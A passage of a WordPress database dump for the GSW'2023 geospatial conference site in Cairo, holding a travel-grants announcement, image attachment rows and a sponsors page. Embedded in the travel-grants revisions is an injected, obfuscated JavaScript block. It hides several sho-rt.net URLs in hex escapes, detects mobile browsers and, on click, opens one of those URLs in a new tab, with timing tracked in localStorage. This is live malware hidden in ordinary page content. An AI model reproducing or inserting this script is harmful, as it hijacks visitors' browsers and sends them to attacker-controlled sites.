_0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','TRAVEL GRANTS','','inherit','closed','closed','','2665-revision-v1','','','2023-08-13 18:37:05','2023-08-13 18:37:05','',2665,'https://gsw2023.com/?p=5146',0,'revision','',0),
(5147,1,'2023-08-13 18:37:50','2023-08-13 18:37:50','[vc_row][vc_column][bsf-info-box icon_size=\"32\" title_font_style=\"font-weight:bold;\"]\r\n<h5><span style=\"font-size: 12pt;\"><strong>Travel Grants by the ISPRS Foundation for GSW’2023, 2-7 September 2023</strong></span></h5>\r\n<span style=\"font-size: 12pt;\">The ISPRS Foundation (TIF) will be offering travel grants to deserving applicants, especially from developing countries, to participate in the <a href=\"https://gsw2023.com/\">Geospatial Week (Egypt GSW’2023)</a>, September 2023, Cairo, Egypt. Please note that The <a href=\"http://www.isprs.org/foundation/Default.aspx\">ISPRS Foundation</a> has limited amount of funds and therefore only limited number of grants will be offered. The following are the important dates for the applicants.</span>\r\n\r\n&nbsp;\r\n<h5><span style=\"font-size: 12pt;\"><strong>TIF TRAVEL GRANT AWARDEES FOR GSW-2023</strong></span></h5>\r\n<span style=\"font-size: 12pt;\">The ISPRS Foundation (TIF) announces the following list applicants as awardees to attend the Geospatial Week 2023 to be held in Cairo, Egypt during Sept. 2-7, 2023. TIF wishes them the very best. They will be informed about the granted amount by e-mail and would be receiving it and the certificate at the venue.</span>\r\n\r\n[/bsf-info-box][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','TRAVEL GRANTS','','inherit','closed','closed','','2665-revision-v1','','','2023-08-13 18:37:50','2023-08-13 18:37:50','',2665,'https://gsw2023.com/?p=5147',0,'revision','',0),
(5148,1,'2023-08-13 19:11:20','2023-08-13 19:11:20','','main_u2','','inherit','open','closed','','main_u2','','','2023-08-13 19:11:20','2023-08-13 19:11:20','',3066,'https://gsw2023.com/wp-content/uploads/2023/08/main_u2.jpg',0,'attachment','image/jpeg',0),
(5149,1,'2023-08-13 19:12:20','2023-08-13 19:12:20','','main_u2','','inherit','open','closed','','main_u2-2','','','2023-08-13 19:12:20','2023-08-13 19:12:20','',3066,'https://gsw2023.com/wp-content/uploads/2023/08/main_u2-1.jpg',0,'attachment','image/jpeg',0),
(5150,1,'2023-08-13 19:17:34','2023-08-13 19:17:34','','main_u3','','inherit','open','closed','','main_u3','','','2023-08-13 19:17:34','2023-08-13 19:17:34','',3066,'https://gsw2023.com/wp-content/uploads/2023/08/main_u3.jpg',0,'attachment','image/jpeg',0),
(5151,1,'2023-08-13 19:43:04','2023-08-13 19:43:04','','main_u5','','inherit','open','closed','','main_u5','','','2023-08-13 19:43:04','2023-08-13 19:43:04','',3066,'https://gsw2023.com/wp-content/uploads/2023/08/main_u5.jpg',0,'attachment','image/jpeg',0),
(5152,1,'2023-08-13 19:45:14','2023-08-13 19:45:14','','main_u5','','inherit','open','closed','','main_u5-2','','','2023-08-13 19:45:14','2023-08-13 19:45:14','',3066,'https://gsw2023.com/wp-content/uploads/2023/08/main_u5-1.jpg',0,'attachment','image/jpeg',0),
(5153,1,'2023-08-13 19:47:32','2023-08-13 19:47:32','','main_u5','','inherit','open','closed','','main_u5-3','','','2023-08-13 19:47:32','2023-08-13 19:47:32','',3066,'https://gsw2023.com/wp-content/uploads/2023/08/main_u5-2.jpg',0,'attachment','image/jpeg',0),
(5154,1,'2023-08-13 19:50:30','2023-08-13 19:50:30','','main_u5','','inherit','open','closed','','main_u5-4','','','2023-08-13 19:50:30','2023-08-13 19:50:30','',3066,'https://gsw2023.com/wp-content/uploads/2023/08/main_u5-3.jpg',0,'attachment','image/jpeg',0),
(5155,1,'2023-08-13 19:52:01','2023-08-13 19:52:01','<h2 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #0000ff;\"><strong>Under the Auspices of </strong></span>\r\n<span style=\"font-size: 24pt; color: #0000ff;\"><strong>H.E. Professor Mostafa Madbouly,</strong></span>\r\n<span style=\"font-size: 24pt; color: #0000ff;\"><strong>Prime Minister of the Arab Republic of Egypt</strong></span></h2>\r\n[vc_separator style=\"shadow\" border_width=\"10\"]\r\n<h4 style=\"text-align: center;\"><strong><span style=\"font-size: 24pt;\">Prime Sponsors</span></strong></h4>\r\n[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 115px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081933017{margin-top: 145px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n<a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081968974{margin-top: 160px !important;}\"]\r\n\r\n<a href=\"https://www.mbrsc.ae/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5093 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081968955{margin-top: 115px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081337215{margin-top: 40px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689080719428{margin-top: 0px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>                    Platinum Sponsors</strong></span></h4>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081395417{margin-top: 10px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\r\n<a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]\r\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]\r\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\r\n<span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690460056235{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" />\r\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\r\n\r\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\r\n<a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\r\n<a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a>\r\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\r\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\r\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" 